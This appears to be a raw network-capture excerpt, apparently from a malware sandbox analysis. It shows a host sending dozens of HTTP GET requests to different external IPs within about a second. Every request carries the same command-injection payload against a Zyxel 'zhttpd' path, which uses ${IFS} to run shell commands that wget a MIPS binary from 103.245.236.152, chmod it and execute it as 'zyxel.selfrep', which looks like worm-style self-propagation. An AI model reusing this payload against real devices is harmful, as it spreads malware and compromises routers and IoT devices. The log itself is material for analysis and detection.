                                            Jan 14, 2024 15:50:39.423072100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4458192.168.2.2345352104.54.111.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.423101902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4459192.168.2.233908020.192.109.236443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.423110962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4460192.168.2.235204275.86.30.121443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.423140049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4461192.168.2.233819459.140.143.189443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.423199892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4462192.168.2.235528072.71.134.162443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.423214912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4463192.168.2.234980491.127.182.239443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.423238993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4464192.168.2.234634643.118.124.140443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.423300028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4465192.168.2.2356812218.112.117.133443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.423317909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4466192.168.2.235288694.121.169.111443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.423347950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4467192.168.2.2344374201.182.188.208443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.423363924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4468192.168.2.2350204158.197.219.225443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.423372984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4469192.168.2.233789425.138.19.139443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.423418999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4470192.168.2.2342484182.252.112.200443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.423424006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4471192.168.2.233644836.73.90.181443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.423450947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4472192.168.2.2336470144.167.132.209443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.423490047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4473192.168.2.2346900114.155.215.2443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.423497915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4474192.168.2.233573497.232.194.128443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.423543930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4475192.168.2.233796042.187.31.81443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.423579931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4476192.168.2.235002284.124.130.168443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.423634052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4477192.168.2.2355508203.241.63.54443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.423655987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4478192.168.2.2339678128.72.99.253443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.423674107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4479192.168.2.235472236.46.168.2443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.423711061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4480192.168.2.2344106161.119.47.69443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.423732996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4481192.168.2.2357006181.8.128.123443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.423773050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4482192.168.2.234031678.94.83.22443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.423801899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4483192.168.2.2357202193.199.136.23443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.423829079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4484192.168.2.233398459.26.214.152443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.423881054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4485192.168.2.2348518192.189.210.242443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.423898935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4486192.168.2.2343174187.228.32.66443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.423943996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4487192.168.2.235611834.207.113.63443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.423985004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4488192.168.2.235949265.40.38.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.424000978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4489192.168.2.234323431.254.148.132443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.424026966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4490192.168.2.2355226114.143.110.124443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.424047947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4491192.168.2.235086083.175.189.104443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.424082041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4492192.168.2.2356398211.251.130.8443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.424103975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4493192.168.2.233916892.143.29.172443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.424127102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4494192.168.2.2348096162.54.176.92443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.424153090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4495192.168.2.234215219.251.49.37443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.424179077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4496192.168.2.235903293.5.246.235443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.424194098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4497192.168.2.235530885.177.77.164443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.424226999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4498192.168.2.234164688.191.141.19443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.424245119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4499192.168.2.23540902.46.44.193443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.424293995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4500192.168.2.2344492152.122.106.200443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.424319029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4501192.168.2.235665089.228.94.176443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.424355984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4502192.168.2.233381452.45.101.106443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.424369097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4503192.168.2.2333086100.17.98.116443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.424443007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4504192.168.2.2350504180.125.93.239443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.424453974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4505192.168.2.2341310184.228.83.154443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.424479961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4506192.168.2.2353334126.15.204.208443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.424606085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4507192.168.2.2360612120.31.174.45443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.424626112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4508192.168.2.2338892115.187.246.116443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.424634933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4509192.168.2.2345070129.186.184.109443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.424654961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4510192.168.2.235023450.34.12.153443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.424705982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4511192.168.2.2343300209.254.101.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.424741983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4512192.168.2.233837235.6.194.154443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.424827099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4513192.168.2.2345906223.219.253.171443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.433024883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4514192.168.2.235928014.16.88.191443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.433051109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4515192.168.2.2348758211.8.103.130443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.433078051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4516192.168.2.235733038.82.142.126443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.433116913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4517192.168.2.2345118139.211.227.101443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.433149099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4518192.168.2.2342720133.240.76.151443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.433160067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4519192.168.2.235748067.81.154.239443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.433192968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4520192.168.2.2352634154.35.124.24443
                                            TimestampBytes transferredDirectionData
